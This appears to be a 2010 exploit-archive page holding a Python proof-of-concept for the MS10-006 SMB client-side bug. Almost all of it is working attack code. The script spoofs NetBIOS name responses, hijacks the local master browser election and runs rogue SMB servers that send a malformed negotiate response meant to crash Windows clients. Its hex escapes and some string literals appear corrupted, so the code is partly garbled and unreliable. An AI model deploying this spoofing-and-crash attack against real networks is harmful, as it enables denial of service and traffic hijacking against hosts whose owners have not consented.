Home / os / win7

MS10-006 SMB Client-Side Bug PoC

Posted on 16 April 2010

=================================================
Proof of Concept for MS10-006 SMB Client-Side Bug
=================================================

# More Info: http://g-laurent.blogspot.com/2010/04/turning-smb-client-bug-to-server-side.html
import sys,SocketServer,socket,threading,time,random
from random import *
from time import sleep
from socket import *
 
if len(sys.argv)<=2:
 sys.exit('Usage: pwn.py Your_ip Broadcast_ip

 Example: pwn.py 10.0.0.1 10.0.0.255')
 
ip = str(sys.argv[1])
nbns = str(sys.argv[2]),137
browser = str(sys.argv[2]),138
 
 
elec = "x42x4fx00"
domainmasterbro = "x42x4cx00"
 
##BROWSER election request
browserelect = [chr(int(a, 16)) for a in """
11 02 bd 82 c0 a8 00 96 00 8a 00 ae 00 00 20 46
47 45 4e 45 43 45 50 46 49 43 41 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 41 41 00
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 14 00 00 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 14 00 56 00 03 00 01
00 01 00 02 00 25 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 08 09 a8 0f 01 20 1b e9
a5 00 00 00 00 00 56 4d 42 4f 58 00""".split()]
 
##Local Master Announcement
browsermaster = [chr(int(a, 16)) for a in """
11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01
00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0f 00 80 fc 0a 00 4d 41
53 54 45 52 00 00 00 00 00 00 00 00 00 00 00 06
2b 10 84 00 00 0f 01 55 aa 00""".split()]
 
resetcache = [chr(int(a, 16)) for a in """
11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 41 42 41 43 46 50 46 50 45 4e 46 44 45 43 46
43 45 50 46 48 46 44 45 46 46 50 46 50 41 43 41
42 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 2b 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01
00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0e 02""".split()]
 
resetlbm = [chr(int(a, 16)) for a in """
11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 41 42 41 43 46 50 46 50 45 4e 46 44 45 43 46
43 45 50 46 48 46 44 45 46 46 50 46 50 41 43 41
42 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 2b 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01
00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0e 01""".split()]
 
##Browser Master annoncement
masterannon = [chr(int(a, 16)) for a in """
11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01
00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0d 4d 41 53 54 45 52 00""".split()]
 
regmsbrowse = [chr(int(a, 16)) for a in """
be 6e 29 10 00 01 00 00 00 00 00 01 20 41 42 41
43 46 50 46 50 45 4e 46 44 45 43 46 43 45 50 46
48 46 44 45 46 46 50 46 50 41 43 41 42 00 00 20
00 01 c0 0c 00 20 00 01 00 04 93 e0 00 06 80 00
c0 a8 00 96""".split()]
 
##NBNS Spoofing
spoof = [chr(int(a, 16)) for a in """
08 f3 85 80 00 00 00 01 00 00 00 00 20 46 48 45
50 46 43 45 4c 45 48 46 43 45 50 46 46 46 41 43
41 43 41 43 41 43 41 43 41 43 41 42 4e 00 00 20
00 01 00 04 93 e0 00 06 00 00""".split()]
 
def nametid(data,packet,service):
    pack = packet[:]
    pack[2:4]=data[2:4] ##Transaction ID
    pack[4:8] = inet_aton(str(sys.argv[1])) ##OurIP Addres
    pack[48:82]=data[48:79]+service ##Service/domain name
    return pack
 
def nametidrand(data,packet,service):
    pack = packet[:]
    pack[2:4]= "x80"+str(chr(choice(range(256)))) ##Transaction ID
    pack[4:8] = inet_aton(str(sys.argv[1])) ##OurIP Addres
    pack[48:82]=data[48:79]+service ##Service/domain name
    return pack
 
def addipbrow(packet):
    pack = packet[:]
    pack[4:8] = inet_aton(str(sys.argv[1]))
    return pack
 
def addipnb(packet):
    pack = packet[:]
    pack[len(packet)-4:] = inet_aton(str(sys.argv[1]))
    return pack
 
def sockbroad(packet,host):
   s = socket(AF_INET,SOCK_DGRAM)
   s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
   s.sendto(packet,host)
 
class BROWSER(SocketServer.BaseRequestHandler):
      
    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)
 
    def handle(self):
        ip = inet_aton(str(sys.argv[1]))
        request, socket = self.request
        data = request
        print "From:", self.client_address
        if data[168] == "x01" or data[168] == "x0f" or data[168] == "x08" and self.client_address[0] != sys.argv[1]:
 
           sockbroad(''.join(addipbrow(resetcache)),browser)
           print "[+]LMB cache Successfully Reseted"
 
           sockbroad(''.join(addipbrow(resetlbm)),browser)
           print "[+]LMB Successfully killed"
 
           for x in range(4):
              sockbroad(''.join(nametid(data,browserelect, elec)),browser)
              sleep(0.8)
           print "[+] Election Won !
"
 
           for x in range(4):
              sleep(0.5)
              sockbroad(''.join(addipnb(regmsbrowse)),nbns)
           print "[+]Now Register __MSBROWSE__ :] "
                   
           sockbroad(''.join(nametidrand(data,browsermaster, elec)),browser)
           sleep(1)
           sockbroad(''.join(nametidrand(data,masterannon, domainmasterbro)),browser)
           print "[+] Now LBM ! 
"
 
#NBNS SPOOF;
 
def namenbnstid(data,packet):
    pack = packet[:]
    pack[0:2]=data[0:2]##Transaction ID
    pack[12:48]=data[12:48]##Netbios name
    return pack
 
class NBNS(SocketServer.BaseRequestHandler):
      
    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)
 
    def handle(self):
        request, socket = self.request
        data = request
        print "From:", self.client_address
        #Hijack
        if data[2:4] == "x01x10":   
           buffer0 = ''.join(namenbnstid(data,spoof))+inet_aton(str(sys.argv[1]))
           socket.sendto(buffer0, self.client_address)
           print "Fake NBNS Response sended
"
 
packetnego = (
##SMB Header
"x00x00x00x7f"                   #Netbios length
"xffx53x4dx42"                   #Server type
"x72"                               #Operation/Command
"x00x00x00x00"                   #Statut command OK Success
"x98"                               #Flag 0x98
"x53xc8"                           #Flag 0xc853
"x00x00"                           #PID High
"x00x00x00x00x00x00x00x00"   #Signature
"x00x00"                           #Reserved
"x00x00"                           #Tree ID
"xffxfe"                           #Process ID
"x00x00"                           #User ID
"x00x00"                           #Multiplex ID
##SMB Header end
 
##Negotiate Protocol
"x11"                               #Word count
"x05x00"                           #Choosen dialect, no-5 from client list
"x03"                               #Security mode
"x41x41"                           #Max MPX count
"x41x41"                           #Max VCs
##Issue
"x03x00x00x00"                   #Max buffer size; The issue is located here, as we specify an only 4 bytes max buffer length is this example.
#Usually a server would provide a 4356 max buffer size.
"x41x41x41x41"                   #Max raw buffer
"x00x00x00x00"                   #Session key
"xfcxe3x01x80"                   #Capabilities
"xeaxb1x6ex18x11x62xcax01"   #System Time
"x2cx01"                           #Server timezone
"x00"                               #Key length
"x3ax00"                           #Byte count
#Server GUID
"x68x52x38x38xf2xe3x9fx4fx94x26xbdxcbxcax2ex28x9a"  
#Security Blob
"x60x28x06x06x2bx06x01x05x05x02xa0x1ex30x1cxa0x1a"
"x30x18x06x0ax2bx06x01x04x01x82x37x02x02x1ex06x0a"
"x2bx06x01x04x01x82x37x02x02x0a"
##Negotiate Protocol end
)
 
class MS10_006(SocketServer.BaseRequestHandler):
 
    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)
 
    def handle(self): 
        print "From:", self.client_address
        data = self.request.recv(256)
        if data[0] == "x81":
           buffer0 = "x82x00x00x00"        
           self.request.send(buffer0)
           print "Session Positive Response sended
"
           data = self.request.recv(1024)
        if data[8] == "x72":    
           self.request.send(packetnego)
           print "Negotiate Response sended kaboom !
"
           data = self.request.recv(1024)
 
 
def serve_thread_udp(host, port, handler):
    server = SocketServer.UDPServer((host, port), handler)
    server.serve_forever()
 
def serve_thread_tcp(host, port, handler):
    server = SocketServer.TCPServer((host, port), handler)
    server.serve_forever()
 
SocketServer.TCPServer.allow_reuse_address = 1
threading.Thread(target=serve_thread_tcp,args=('', 139,MS10_006)).start()
threading.Thread(target=serve_thread_tcp,args=('', 445,MS10_006)).start()
threading.Thread(target=serve_thread_udp,args=('', 137,NBNS)).start()
threading.Thread(target=serve_thread_udp,args=('', 138,BROWSER)).start()


# Inj3ct0r.com [2010-04-16]

 

TOP